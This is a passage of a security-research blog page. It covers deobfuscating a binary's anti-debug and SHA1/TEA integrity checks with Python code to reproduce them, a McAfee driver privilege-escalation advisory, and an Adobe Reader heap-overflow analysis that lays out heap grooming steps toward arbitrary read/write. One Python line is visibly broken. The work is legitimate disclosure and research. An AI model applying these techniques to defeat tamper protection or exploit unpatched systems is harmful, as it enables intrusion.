After executing the INT 0x3 instruction, the code flow is resumed in the exception handler as can be seen below.

If the exception code from the EXCEPTION_RECORD structure is a debug breakpoint, a bitwise NOT is applied to one of the constants stored on stack. Additionally, the Windows interrupt handler handles every debug exception assuming they stemmed from executing the short version of the instruction (0xCC), so were a debugger to intercept the exception, those two elements need to be taken into consideration in order for execution to continue normally.

Upon continuing execution, a small arithmetic operation checks that the addition of one of the initially set constants (0x8A7B7A99) and a third one (0x60D7B571) is equal to the bitwise NOT of the second initial constant (0x14ACCFF5), which is the operation performed by the exception handler.

0x8A7B7A99 + 0x60D7B571 == 0xEB53300AA == ~0x14ACCFF5

A variant using the same exception handler operates in a very similar manner, substituting the debug exception with an access violation triggered via allocating a guard page and accessing it (this behavior is also flagged by ICPin).

Rebuilding The Executable

Once all the passes have been applied to all the obfuscated functions, the patches can be recorded, then applied to a free area of the new executable, and a JUMP is inserted at the function’s original offset.

Example of a function before and after deobfuscation:

Obfuscator’s Integrity Checking Internals

It is generally unnecessary to dig into the details of an obfuscator’s integrity checking mechanism; most times, as described in the previous example, identifying its location or expected result is sufficient to disable it. However, this provides a good opportunity to demonstrate the use of a DSE to address an obfuscator’s internals – theoretically its most hardened part.

ICPin output immediately highlights a number of code locations performing incremental reads on addresses in the executable’s .text section. Some manual investigation of these code locations points us to the spot where a function call or branching instruction switches to the obfuscated execution flow. However, there are no clearly defined function frames and the entire set of executed instructions is too large to display in IDA.

In order to get a sense of the execution flow, a simple jitter callback can be used to gather all the executed blocks as the engine runs through the code. Looking at the discovered blocks, it becomes apparent that the code uses conditional instructions to alter the return address on the stack, and hides its real destination with opaque predicates and obfuscated logic.

Starting with that information, it would be possible to take a similar approach as in the previous example and thoroughly rebuild the IR CFG, apply simplifications, and recompile the new assembly using LLVM. However, in this instance, armed with the knowledge that this obfuscated code implements an integrity check, it is advantageous to leverage the capabilities of a DSE.

A CFG of the obfuscated flow can still be roughly computed, by recording every block executed and adding edges based on the tracked destinations. The stock simplifications and SSA form can be used to obtain a graph of the general shape below:

Deciphering The Data Blobs

On a first run attempt, one can observe 8-byte reads from blobs located in two separate memory locations in the .text section, which are then processed through a loop (also conveniently identified by the tracking engine). With the memX symbols representing constants in memory, and blob0 representing the sequentially read input from a 32bit ciphertext blob, the symbolic values extracted from the blobs look as follows, looping 32 times:

res = (blob0 + ((mem1 ^ mem2)*mul) + sh32l((mem1 ^ mem2), 0x5)) ^ (mem3 + sh32l(blob0, 0x4)) ^ (mem4 + sh32r(blob0,  0x5))

Inspection of the values stored at memory locations mem1 and mem2 reveals the following constants:

@32[0x1400DF45A]: 0xA46D3BBF
@32[0x14014E859]: 0x3A5A4206

0xA46D3BBF^0x3A5A4206 = 0x9E3779B9

0x9E3779B9 is a well-known nothing up my sleeve number, based on the golden ratio, and notably used by RC5. In this instance however, the expression points at another Feistel cipher, TEA, or Tiny Encryption Algorithm:

void decrypt (uint32_t v[2], const uint32_t k[4]) {
    uint32_t v0=v[0], v1=v[1], sum=0xC6EF3720, i;  /* set up; sum is 32*delta */
    uint32_t delta=0x9E3779B9;                     /* a key schedule constant */
    uint32_t k0=k[0], k1=k[1], k2=k[2], k3=k[3];   /* cache key */
    for (i=0; i<32; i++) {                         /* basic cycle start */
        v1 -= ((v0<<4) + k2) ^ (v0 + sum) ^ ((v0>>5) + k3);
        v0 -= ((v1<<4) + k0) ^ (v1 + sum) ^ ((v1>>5) + k1);
        sum -= delta;
    }
    v[0]=v0; v[1]=v1;
}

Consequently, the 128-bit key can be trivially recovered from the remaining memory locations identified by the symbolic engine.

Extracting The Offset Ranges

With the decryption cipher identified, the next step is to reverse the logic of computing ranges of memory to be hashed. Here again, the memory tracking execution engine proves useful and provides two data points of interest:
– The binary is not hashed in a continuous way; rather, 8-byte offsets are regularly skipped
– A memory region is iteratively accessed before each hashing

Using a DSE such as this one, symbolizing the first two bytes of the memory region and letting it run all the way to the address of the instruction that reads memory, we obtain the output below (edited for clarity):

-- MEM ACCESS: {BLOB0 & 0x7F 0 8, 0x0 8 64} + 0x140000000
# {BLOB0 0 8, 0x0 8 32} & 0x80 = 0x0
...

-- MEM ACCESS: {(({BLOB1 0 8, 0x0 8 32} & 0x7F) << 0x7) | {BLOB0 & 0x7F 0 8, 0x0 8 32} 0 32, 0x0 32 64} + 0x140000000
# 0x0 = ({BLOB0 0 8, 0x0 8 32} & 0x80)?(0x0,0x1)
# ((({BLOB1 0 8, 0x0 8 32} & 0x7F) << 0x7) | {BLOB0 & 0x7F 0 8, 0x0 8 32}) == 0xFFFFFFFF = 0x0
...

The accessed memory’s symbolic addresses alone provide a clear hint at the encoding: only 7 of the bits of each symbolized byte are used to compute the address. Looking further into the accesses, the second byte is only used if the first byte’s most significant bit is not set, which tracks with a simple unsigned integer base-128 compression. Essentially, the algorithm reads one byte at a time, using 7 bits for data, and using the last bit to indicate whether one or more byte should be read to compute the final value.

Identifying The Hashing Algorithm

In order to establish whether the integrity checking implements a known hashing algorithm, despite the static disassembly showing no sign of known constants, a memory tracking symbolic execution engine can be used to investigate one level deeper. Early in the execution (running the obfuscated code in its entirety may take a long time), one can observe the following pattern, revealing well-known SHA1 constants.

0x140E34F50 READ @32[0x140D73B5D]: 0x96F977D0
0x140E34F52 READ @32[0x140B1C599]: 0xF1BC54D1
0x140E34F54 READ @32[0x13FC70]: 0x0
0x140E34F5A READ @64[0x13FCA0]: 0x13FCD0
0x140E34F5E WRITE @32[0x13FCD0]: 0x67452301

0x140E34F50 READ @32[0x140D73B61]: 0x752ED515
0x140E34F52 READ @32[0x140B1C59D]: 0x9AE37E9C
0x140E34F54 READ @32[0x13FC70]: 0x1
0x140E34F5A READ @64[0x13FCA0]: 0x13FCD0
0x140E34F5E WRITE @32[0x13FCD4]: 0xEFCDAB89

0x140E34F50 READ @32[0x140D73B65]: 0xF9396DD4
0x140E34F52 READ @32[0x140B1C5A1]: 0x6183B12A
0x140E34F54 READ @32[0x13FC70]: 0x2
0x140E34F5A READ @64[0x13FCA0]: 0x13FCD0
0x140E34F5E WRITE @32[0x13FCD8]: 0x98BADCFE

0x140E34F50 READ @32[0x140D73B69]: 0x2A1B81B5
0x140E34F52 READ @32[0x140B1C5A5]: 0x3A29D5C3
0x140E34F54 READ @32[0x13FC70]: 0x3
0x140E34F5A READ @64[0x13FCA0]: 0x13FCD0
0x140E34F5E WRITE @32[0x13FCDC]: 0x10325476

0x140E34F50 READ @32[0x140D73B6D]: 0xFB95EF83
0x140E34F52 READ @32[0x140B1C5A9]: 0x38470E73
0x140E34F54 READ @32[0x13FC70]: 0x4
0x140E34F5A READ @64[0x13FCA0]: 0x13FCD0
0x140E34F5E WRITE @32[0x13FCE0]: 0xC3D2E1F0

Examining the relevant code addresses (as seen in the SSA notation below), it becomes evident that, in order to compute the necessary hash constants, a simple XOR instruction is used with two otherwise meaningless constants, rendering algorithm identification less obvious from static analysis alone.

And the expected SHA1 constants are stored on the stack:

0x96F977D0^0xF1BC54D1 ==> 0x67452301
0x752ED515^0x9AE37E9C ==> 0XEFCDAB89
0xF9396DD4^0x6183B12A ==> 0X98BADCFE
0x2A1B81B5^0x3A29D5C3 ==> 0X10325476
0xFB95EF83^0x38470E73 ==> 0XC3D2E1F0

Additionally, the SHA1 algorithm steps can be further observed in the SSA graph, such as the ROTL-5 and ROTL-30 operations, plainly visible in the IL below.

Final Results

The entire integrity checking logic recovered from the obfuscator implemented in Python below was verified to produce the same digest, as when running under the debugger, or a straightforward LLVM jitter. The parse_ranges() function handles the encoding, while the accumulate_bytes() generator handles the deciphering and processing of both range blobs and skipped offset blobs.

Once the hashing of the memory ranges dictated by the offset table has completed, the 64bit values located at the offsets deciphered from the second blob are subsequently hashed. Finally, once the computed hash value has been successfully compared to the valid digest stored within the RWX .text section of the executable, the execution flow is deemed secure and the obfuscator proceeds to decipher protected functions within the .text section.

def parse_ranges(table):
  ranges = []
  rangevals = []
  tmp = []
  for byte in table:
    tmp.append(byte)
    if not byte&0x80:
      val = 0
      for i,b in enumerate(tmp):
        val |= (b&0x7F)<<(7*i)
      rangevals.append(val)
      tmp = [] # reset
  offset = 0
  for p in [(rangevals[i], rangevals[i+1]) for i in range(0, len(rangevals), 2)]:
    offset += p[0]
    if offset == 0xFFFFFFFF:
      break
    ranges.append((p[0], p[1]))
    offset += p[1]
  return ranges

def accumulate_bytes(r, s):
  # TEA Key is 128 bits
  dw6 = 0xF866ED75
  dw7 = 0x31CFE1EF
  dw4 = 0x1955A6A0
  dw5 = 0x9880128B
  key = struct.pack('IIII', dw6, dw7, dw4, dw5)
  # Decipher ranges plaintext
  ranges_blob = pe[pe.virt2off(r[0]):pe.virt2off(r[0])+r[1]]
  ranges = parse_ranges(Tea(key).decrypt(ranges_blob))
  # Decipher skipped offsets plaintext (8bytes long)
  skipped_blob = pe[pe.virt2off(s[0]):pe.virt2off(s[0])+s[1]]
  skipped_decrypted = Tea(key).decrypt(skipped_blob)
  skipped = sorted( \
    [int.from_bytes(skipped_decrypted[i:i+4], byteorder='little', signed=False) \
        for i in range(0, len(skipped_decrypted), 4)][:-2:2] \
  )
  skipped_copy = skipped.copy()
  next_skipped = skipped.pop(0)
  current = 0x0
  for rr in ranges:
    current += rr[0]
    size = rr[1]
    # Get the next 8 bytes to skip
    while size and next_skipped and next_skipped = 0
      yield blob
      current = next_skipped+8
      next_skipped = skipped.pop(0) if skipped else None
    blob = pe[pe.rva2off(current):pe.rva2off(current)+size]
    yield blob
    current += len(blob)
  # Append the initially skipped offsets
  yield b''.join(pe[pe.rva2off(rva):pe.rva2off(rva)+0x8] for rva in skipped_copy)
  return

def main():
  global pe
  hashvalue = hashlib.sha1()
  hashvalue.update(b'\x7B\x0A\x97\x43')
  with open(argv[1], "rb") as f:
    pe = PE(f.read())
  accumulator = accumulate_bytes((0x140A85B51, 0xFCBCF), (0x1409D7731, 0x12EC8))
  # Get all hashed bytes
  for blob in accumulator:
    hashvalue.update(blob)
  print(f'SHA1 FINAL: {hashvalue.hexdigest()}')
  return

Disclaimer

None of the samples used in this publication were part of an NCC Group engagement. They were selected from publicly available binaries whose obfuscators exhibited features similar to previously encountered ones.

Due to the nature of this material, specific content had to be redacted, and a number of tools that were created as part of this effort could not be shared publicly.

Despite these limitations, the author hopes the technical content shared here is sufficient to provide the reader with a stimulating read.

References

Related Content

Technical Advisory – NULL Pointer Derefence in McAfee Drive Encryption (CVE-2021-23893)

Vendor: McAfee
Vendor URL: https://kc.mcafee.com/corporate/index?page=content&id=sb10361
Versions affected: Prior to 7.3.0 HF1
Systems Affected: Windows OSs without NULL page protection 
Author: Balazs Bucsay <balazs.bucsay[ at ]nccgroup[.dot.]com> @xoreipeip
CVE Identifier: CVE-2021-23893
Risk: 8.8 - CWE-269: Improper Privilege Management

Summary

McAfee’s Complete Data Protection package contained the Drive Encryption (DE) software. This software was used to transparently encrypt the drive contents. The versions prior to 7.3.0 HF1 had a vulnerability in the kernel driver MfeEpePC.sys that could be exploited on certain Windows systems for privilege escalation or DoS.

Impact

Privilege Escalation vulnerability in a Windows system driver of McAfee Drive Encryption (DE) prior to 7.3.0 could allow a local non-admin user to gain elevated system privileges via exploiting an unutilized memory buffer.

Details

The Drive Encryption software’s kernel driver was loaded to the kernel at boot time and certain IOCTLs were available for low-privileged users.

One of the available IOCTL was referencing an event that was set to NULL before initialization. In case the IOCTL was called at the right time, the procedure used NULL as an event and referenced the non-existing structure on the NULL page.

If the user mapped the NULL page and created a fake structure there that mimicked a real Even structure, it was possible to manipulate certain regions of the memory and eventually execute code in the kernel.

Recommendation

Install or update Disk Encryption 7.3.0 HF1, which has this vulnerability fixed.

Vendor Communication

February 24, 2021: Vulnerability was reported to McAfee

March 9, 2021: McAfee was able to reproduce the crash with the originally provided DoS exploit

October 1, 2021: McAfee released the new version of DE, which fixes the issue

Acknowledgements

Thanks to the Cedric Halbronn for his support during the development of the exploit.

About NCC Group

NCC Group is a global expert in cybersecurity and risk mitigation, working with businesses to protect their brand, value and reputation against the ever-evolving threat landscape. With our knowledge, experience and global footprint, we are best placed to help businesses identify, assess, mitigate & respond to the risks they face. We are passionate about making the Internet safer and revolutionizing the way in which organizations think about cybersecurity. 

Published date:  October 4, 2021

Written by:  Balazs Bucsay

Analysis of a Heap Buffer-Overflow Vulnerability in Adobe Acrobat Reader DC

By Sergi Martinez

In late June, we published a blog post containing analysis of exploitation of a heap-buffer overflow vulnerability in Adobe Reader, a vulnerability that we thought corresponded to CVE-2021-21017. The starting point for the research was a publicly posted proof-of-concept containing root-cause analysis. Soon after publishing the blog post, we learnt that the CVE was not authoritative and that the publicly posted proof-of-concept was an 0day, even if the 0day could not be reproduced in the patched version. We promptly pulled the blog post and began investigating.

Further research showed that the vulnerability continued to exist in the latest version and was exploitable with only a few changes to our exploit. We reported our findings to Adobe. Adobe assigned CVE-2021-39863 to this vulnerability and released an advisory and patched versions of their products on September 14th, 2021.

Since the exploits were very similar, this post largely overlaps with the blog post previously removed. It analyzes and exploits CVE-2021-39863, a heap buffer overflow in Adobe Acrobat Reader DC up to and including version 2021.005.20060.

This post is similar to our previous post on Adobe Acrobat Reader, which exploits a use-after-free vulnerability that also occurs while processing Unicode and ANSI strings.

Overview

A heap buffer-overflow occurs in the concatenation of an ANSI-encoded string corresponding to a PDF document’s base URL. This occurs when an embedded JavaScript script calls functions located in the IA32.api module that deals with internet access, such as this.submitForm and app.launchURL. When these functions are called with a relative URL of a different encoding to the PDF’s base URL, the relative URL is treated as if it has the same encoding as the PDF’s path. This can result in the copying twice the number of bytes of the source ANSI string (relative URL) into a properly-sized destination buffer, leading to both an out-of-bounds read and a heap buffer overflow.

CVE-2021-39863

Acrobat Reader has a built-in JavaScript engine based on Mozilla’s SpiderMonkey. Embedded JavaScript code in PDF files is processed and executed by the EScript.api module in Adobe Reader.

Internet access related operations are handled by the IA32.api module. The vulnerability occurs within this module when a URL is built by concatenating the PDF document’s base URL and a relative URL. This relative URL is specified as a parameter in a call to JavaScript functions that trigger any kind of Internet access such as this.submitForm and app.launchURL. In particular, the vulnerability occurs when the encoding of both strings differ.

The concatenation of both strings is done by allocating enough memory to fit the final string. The computation of the length of both strings is correctly done taking into account whether they are ANSI or Unicode. However, when the concatenation occurs only the base URL encoding is checked and the relative URL is considered to have the same encoding as the base URL. When the relative URL is ANSI encoded, the code that copies bytes from the relative URL string buffer into the allocated buffer copies it two bytes at a time instead of just one byte at a time. This leads to reading a number of bytes equal to the length of the relative URL from outside the source buffer and copying it beyond the bounds of the destination buffer by the same length, resulting in both an out-of-bounds read and an out-of-bounds write vulnerability.

Code Analysis

The following code blocks show the affected parts of methods relevant to this vulnerability. Code snippets are demarcated by reference marks denoted by [N]. Lines not relevant to this vulnerability are replaced by a [Truncated] marker.

All code listings show decompiled C code; source code is not available in the affected product. Structure definitions are obtained by reverse engineering and may not accurately reflect structures defined in the source code.

The following function is called when a relative URL needs to be concatenated to a base URL. Aside from the concatenation it also checks that both URLs are valid.

__int16 __cdecl sub_25817D70(wchar_t *Source, CHAR *lpString, char *String, _DWORD *a4, int *a5)
{
  __int16 v5; // di
  wchar_t *v6; // ebx
  CHAR *v7; // eax
  CHAR v8; // dl
  __int64 v9; // rax
  wchar_t *v10; // ecx
  __int64 v11; // rax
  int v12; // eax
  int v13; // eax
  int v14; // eax

[Truncated]

  v77 = 0;
  v76 = 0;
  v5 = 1;
  *(_QWORD *)v78 = 0i64;
  *(_QWORD *)iMaxLength = 0i64;
  v6 = 0;
  v49 = 0;
  v62 = 0;
  v74 = 0;
  if ( !a5 )
    return 0;
  *a5 = 0;
  v7 = lpString;

[1]

  if ( lpString && *lpString && (v8 = lpString[1]) != 0 && *lpString == (CHAR)0xFE && v8 == (CHAR)0xFF )
  {

[2]

    v9 = sub_2581890C(lpString);
    v78[1] = v9;
    if ( (HIDWORD(v9) & (unsigned int)v9) == -1 )
    {
LABEL_9:
      *a5 = -2;
      return 0;
    }
    v7 = lpString;
  }
  else
  {

[3]

    v78[1] = v78[0];
  }
  v10 = Source;
  if ( !Source || !v7 || !String || !a4 )
  {
    *a5 = -2;
    goto LABEL_86;
  }

[4]

  if ( *(_BYTE *)Source != 0xFE )
    goto LABEL_25;
  if ( *((_BYTE *)Source + 1) == 0xFF )
  {
    v11 = sub_2581890C(Source);
    iMaxLength[1] = v11;
    if ( (HIDWORD(v11) & (unsigned int)v11) == -1 )
      goto LABEL_9;
    v10 = Source;
    v12 = iMaxLength[1];
  }
  else
  {
    v12 = iMaxLength[0];
  }

[5]

  if ( *(_BYTE *)v10 == 0xFE && *((_BYTE *)v10 + 1) == 0xFF )
  {
    v13 = v12 + 2;
  }
  else
  {
LABEL_25:
    v14 = sub_25802A44((LPCSTR)v10);
    v10 = v37;
    v13 = v14 + 1;
  }
  iMaxLength[1] = v13;

[6]

  v15 = (CHAR *)sub_25802CD5(v10, 1, v13);
  v77 = v15;
  if ( !v15 )
  {
    *a5 = -7;
    return 0;
  }

[7]

  sub_25802D98(v38, (wchar_t *)v15, Source, iMaxLength[1]);

[8]

  if ( *lpString == (CHAR)0xFE && lpString[1] == (CHAR)0xFF )
  {
    v17 = v78[1] + 2;
  }
  else
  {
    v18 = sub_25802A44(lpString);
    v16 = v39;
    v17 = v18 + 1;
  }
  v78[1] = v17;

[9]

  v19 = (CHAR *)sub_25802CD5(v16, 1, v17);
  v76 = v19;
  if ( !v19 )
  {
    *a5 = -7;
LABEL_86:
    v5 = 0;
    goto LABEL_87;
  }

[10]

  sub_25802D98(v40, (wchar_t *)v19, (wchar_t *)lpString, v78[1]);
  if ( !(unsigned __int16)sub_258033CD(v77, iMaxLength[1], a5) || !(unsigned __int16)sub_258033CD(v76, v78[1], a5) )
    goto LABEL_86;

[11]

  v20 = sub_25802400(v77, v42);
  if ( v20 || (v20 = sub_25802400(v76, v50)) != 0 )
  {
    *a5 = v20;
    goto LABEL_86;
  }
  if ( !*(_BYTE *)Source || (v21 = v42[0], v50[0] != 5) && v50[0] != v42[0] )
  {
    v35 = sub_25802FAC(v50);
    v23 = a4;
    v24 = v35 + 1;
    if ( v35 + 1 > *a4 )
      goto LABEL_44;
    *a4 = v35;
    v25 = v50;
    goto LABEL_82;
  }
  if ( *lpString )
  {
    v26 = v55;
    v63[1] = v42[1];
    v63[2] = v42[2];
    v27 = v51;
    v63[0] = v42[0];
    v73 = 0i64;
    if ( !v51 && !v53 && !v55 )
    {
      if ( (unsigned __int16)sub_25803155(v50) )
      {
        v28 = v44;
        v64 = v42[3];
        v65 = v42[4];
        v66 = v42[5];
        v67 = v42[6];
        v29 = v43;
        if ( v49 == 1 )
        {
          v29 = v43 + 2;
          v28 = v44 - 1;
          v43 += 2;
          --v44;
        }
        v69 = v28;
        v68 = v29;
        v70 = v45;
        if ( v58 )
        {
          if ( *v59 != 47 )
          {

[12]

            v6 = (wchar_t *)sub_25802CD5((wchar_t *)(v58 + 1), 1, v58 + 1 + v46);
            if ( !v6 )
            {
              v23 = a4;
              v24 = v58 + v46 + 1;
              goto LABEL_44;
            }
            if ( v46 )
            {

[13]

              sub_25802D98(v41, v6, v47, v46 + 1);
              if ( *((_BYTE *)v6 + v46 - 1) != 47 )
              {
                v31 = sub_25818D6E(v30, (char *)v6, 47);
                if ( v31 )
                  *(_BYTE *)(v31 + 1) = 0;
                else
                  *(_BYTE *)v6 = 0;
              }
            }
            if ( v58 )
            {

[14]

              v32 = sub_25802A44((LPCSTR)v6);
              sub_25818C6A((char *)v6, v59, v58 + 1 + v32);
            }
            sub_25802E0C(v6, 0);
            v71 = sub_25802A44((LPCSTR)v6);
            v72 = v6;
            goto LABEL_75;
          }
          v71 = v58;
          v72 = v59;
        }

[Truncated]

LABEL_87:
  if ( v77 )
    (*(void (__cdecl **)(LPCSTR))(dword_25824098 + 12))(v77);
  if ( v76 )
    (*(void (__cdecl **)(LPCSTR))(dword_25824098 + 12))(v76);
  if ( v6 )
    (*(void (__cdecl **)(wchar_t *))(dword_25824098 + 12))(v6);
  return v5;
}

The function listed above receives as parameters a string corresponding to a base URL and a string corresponding to a relative URL, as well as two pointers used to return data to the caller. The two string parameters are shown in the following debugger output.

IA32!PlugInMain+0x168b0:
63ee7d70 55              push    ebp
0:000> dd poi(esp+4) L84
093499c8  7468fffe 3a737074 6f672f2f 656c676f
093499d8  6d6f632e 4141412f 41414141 41414141
093499e8  41414141 41414141 41414141 41414141
093499f8  41414141 41414141 41414141 41414141

[Truncated]

09349b98  41414141 41414141 41414141 41414141
09349ba8  41414141 41414141 41414141 41414141
09349bb8  41414141 41414141 41414141 2f2f3a41
09349bc8  00000000 0009000a 00090009 00090009
0:000> da poi(esp+4) L84
093499c8  "..https://google.com/AAAAAAAAAAA"
093499e8  "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
09349a08  "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
09349a28  "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
09349a48  "AAAA"
0:000> dd poi(esp+8)
0b943ca8  61616262 61616161 61616161 61616161
0b943cb8  61616161 61616161 61616161 61616161
0b943cc8  61616161 61616161 61616161 61616161
0b943cd8  61616161 61616161 61616161 61616161
0b943ce8  61616161 61616161 61616161 61616161
0b943cf8  61616161 61616161 61616161 61616161
0b943d08  61616161 61616161 61616161 61616161
0b943d18  61616161 61616161 61616161 61616161
0:000> da poi(esp+8)
0b943ca8  "bbaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
0b943cc8  "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
0b943ce8  "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
0b943d08  "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"

[Truncated]

0b943da8  "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
0b943dc8  "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
0b943de8  "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
0b943e08  "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"

The debugger output shown above corresponds to an execution of the exploit. It shows the contents of the first and second parameters (esp+4 and esp+8) of the function sub_25817D70. The first parameter contains a Unicode-encoded base URL https://google.com/ (notice the 0xfeff bytes at the start of the string), while the second parameter contains an ASCII string corresponding to the relative URL. Both contain a number of repeated bytes that serve as padding to control the allocation size needed to hold them, which is useful for exploitation.

At [1] a check is made to ascertain whether the second parameter (i.e. the base URL) is a valid Unicode UTF-16BE encoded string. If it is valid, the length of that string is calculated at [2] and stored in v78[1]. If it is not a valid UTF-16BE encoded string, v78[1] is set to 0 at [3]. The function that calculates the Unicode string length, sub_2581890C(), performs additional checks to ensure that the string passed as a parameter is a valid UTF-16BE encoded string. The following listing shows the decompiled code of this function.

int __cdecl sub_2581890C(char *a1)
{
  char *v1; // eax
  char v2; // cl
  int v3; // esi
  char v4; // bl
  char *v5; // eax
  int result; // eax

  v1 = a1;
  if ( !a1 || *a1 != (char)0xFE || a1[1] != (char)0xFF )
    goto LABEL_12;
  v2 = 0;
  v3 = 0;
  do
  {
    v4 = *v1;
    v5 = v1 + 1;
    if ( !v5 )
      break;
    v2 = *v5;
    v1 = v5 + 1;
    if ( !v4 )
      goto LABEL_10;
    if ( !v2 )
      break;
    v3 += 2;
  }
  while ( v1 );
  if ( v4 )
    goto LABEL_12;
LABEL_10:
  if ( !v2 )
    result = v3;
  else
LABEL_12:
    result = -1;
  return result;
}

The code listed above returns the length of the UTF-16BE encoded string passed as a parameter. Additionally, it implicitly performs the following checks to ensure the string has a valid UTF-16BE encoding:

  • The string must terminate with a double null byte.
  • The words composing the string that are not the terminator must not contain a null byte.

If any of the checks above fail, the function returns -1.

Continuing with the first function mentioned in this section, at [4] the same checks already described are applied to the first parameter (i.e. the relative URL). At [5] the length of the Source variable (i.e. the base URL) is calculated taking into account its encoding. The function sub_25802A44() is an implementation of the strlen() function that works for both Unicode and ANSI encoded strings. At [6] an allocation of the size of the Source variable is performed by calling the function sub_25802CD5(), which is an implementation of the known calloc() function. Then, at [7], the contents of the Source variable are copied into this new allocation using the function sub_25802D98(), which is an implementation of the strncpy function that works for both Unicode and ANSI encoded strings. These operations performed on the Source variable are equally performed on the lpString variable (i.e. the relative URL) at [8], [9], and [10].

The function at [11], sub_25802400(), receives a URL or a part of it and performs some validation and processing. This function is called on both base and relative URLs.

At [12] an allocation of the size required to host the concatenation of the relative URL and the base URL is performed. The lengths provided are calculated in the function called at [11]. For the sake of simplicity it is illustrated with an example: the following debugger output shows the value of the parameters to sub_25802CD5 that correspond to the number of elements to be allocated, and the size of each element. In this case the size is the addition of the length of the base and relative URLs.

eax=00002600 ebx=00000000 ecx=00002400 edx=00000000 esi=010fd228 edi=00000001
eip=61912cd5 esp=010fd0e4 ebp=010fd1dc iopl=0         nv up ei pl nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000206
IA32!PlugInMain+0x1815:
61912cd5 55              push    ebp
0:000> dd esp+4 L1
010fd0e8  00000001
0:000> dd esp+8 L1
010fd0ec  00002600

Afterwards, at [13] the base URL is copied into the memory allocated to host the concatenation and at [14] its length is calculated and provided as a parameter to the call to sub_25818C6A. This function implements string concatenation for both Unicode and ANSI strings. The call to this function at [14] provides the base URL as the first parameter, the relative URL as the second parameter and the expected full size of the concatenation as the third. This function is listed below.

int __cdecl sub_sub_25818C6A(char *Destination, char *Source, int a3)
{
  int result; // eax
  int pExceptionObject; // [esp+10h] [ebp-4h] BYREF

  if ( !Destination || !Source || !a3 )
  {
    (*(void (__thiscall **)(_DWORD, int))(dword_258240A4 + 4))(*(_DWORD *)(dword_258240A4 + 4), 1073741827);
    pExceptionObject = 0;
    CxxThrowException(&pExceptionObject, (_ThrowInfo *)&_TI1H);
  }

[15]

  pExceptionObject = sub_25802A44(Destination);
  if ( pExceptionObject + sub_25802A44(Source) <= (unsigned int)(a3 - 1) )
  {

[16]

    sub_258189D6(Destination, Source);
    result = 1;
  }
  else
  {

[17]

    strncat(Destination, Source, a3 - pExceptionObject - 1);
    result = 0;
    Destination[a3 - 1] = 0;
  }
  return result;
}

In the above listing, at [15] the length of the destination string is calculated. It then checks if the length of the destination string plus the length of the source string is less or equal than the desired concatenation length minus one. If the check passes, the function sub_258189D6 is called at [16]. Otherwise the strncat function at [17] is called.

The function sub_258189D6 called at [16] implements the actual string concatenation that works for both Unicode and ANSI strings.

LPSTR __cdecl sub_258189D6(LPSTR lpString1, LPCSTR lpString2)
{
  int v3; // eax
  LPCSTR v4; // edx
  CHAR *v5; // ecx
  CHAR v6; // al
  CHAR v7; // bl
  int pExceptionObject; // [esp+10h] [ebp-4h] BYREF

  if ( !lpString1 || !lpString2 )
  {
    (*(void (__thiscall **)(_DWORD, int))(dword_258240A4 + 4))(*(_DWORD *)(dword_258240A4 + 4), 1073741827);
    pExceptionObject = 0;
    CxxThrowException(&pExceptionObject, (_ThrowInfo *)&_TI1H);
  }

[18]

  if ( *lpString1 == (CHAR)0xFE && lpString1[1] == (CHAR)0xFF )
  {

[19]

    v3 = sub_25802A44(lpString1);
    v4 = lpString2 + 2;
    v5 = &lpString1[v3];
    do
    {
      do
      {
        v6 = *v4;
        v4 += 2;
        *v5 = v6;
        v5 += 2;
        v7 = *(v4 - 1);
        *(v5 - 1) = v7;
      }
      while ( v6 );
    }
    while ( v7 );
  }
  else
  {

[20]

    lstrcatA(lpString1, lpString2);
  }
  return lpString1;
}

In the function listed above, at [18] the first parameter (the destination) is checked for the Unicode BOM marker 0xFEFF. If the destination string is Unicode the code proceeds to [19]. There, the source string is appended at the end of the destination string two bytes at a time. If the destination string is ANSI, then the known lstrcatA function is called at [20].

It becomes clear that in the event that the destination string is Unicode and the source string is ANSI, for each character of the ANSI string two bytes are actually copied. This causes an out-of-bounds read of the size of the ANSI string that becomes a heap buffer overflow of the same size once the bytes are copied.

Exploitation

We’ll now walk through how this vulnerability can be exploited to achieve arbitrary code execution. 

Adobe Acrobat Reader DC version 2021.005.20048 running on Windows 10 x64 was used to develop the exploit. Note that Adobe Acrobat Reader DC is a 32-bit application. A successful exploit strategy needs to bypass the following security mitigations on the target:

  • Address Space Layout Randomization (ASLR)
  • Data Execution Prevention (DEP)
  • Control Flow Guard (CFG)

The exploit does not bypass the following protection mechanisms:

  • Control Flow Guard (CFG): CFG must be disabled in the Windows machine for this exploit to work. This may be done from the Exploit Protection settings of Windows 10, setting the Control Flow Guard (CFG) option to Off by default.

In order to exploit this vulnerability bypassing ASLR and DEP, the following strategy is adopted:

  1. Prepare the heap layout to allow controlling the memory areas adjacent to the allocations made for the base URL and the relative URL. This involves performing enough allocations to activate the Low Fragmentation Heap bucket for the two sizes, and enough allocations to entirely fit a UserBlock. The allocations with the same size as the base URL allocation must contain an ArrayBuffer object, while the allocations with the same size as the relative URL must have the data required to overwrite the byteLength field of one of those ArrayBuffer objects with the value 0xffff.
  2. Poke some holes on the UserBlock by nullifying the reference to some of the recently allocated memory chunks.
  3. Trigger the garbage collector to free the memory chunks referenced by the nullified objects. This provides room for the base URL and relative URL allocations.
  4. Trigger the heap buffer overflow vulnerability, so the data in the memory chunk adjacent to the relative URL will be copied to the memory chunk adjacent to the base URL.
  5. If everything worked, step 4 should have overwritten the byteLength of one of the controlled ArrayBuffer objects. When a DataView object is created on the corrupted ArrayBuffer it is possible to read and write memory beyond the underlying allocation. This provides a precise way of overwriting the byteLength of the next ArrayBuffer with the value 0xffffffff. Creating a DataView object on this last ArrayBuffer allows reading and writing memory arbitrarily, but relative to where the ArrayBuffer is.
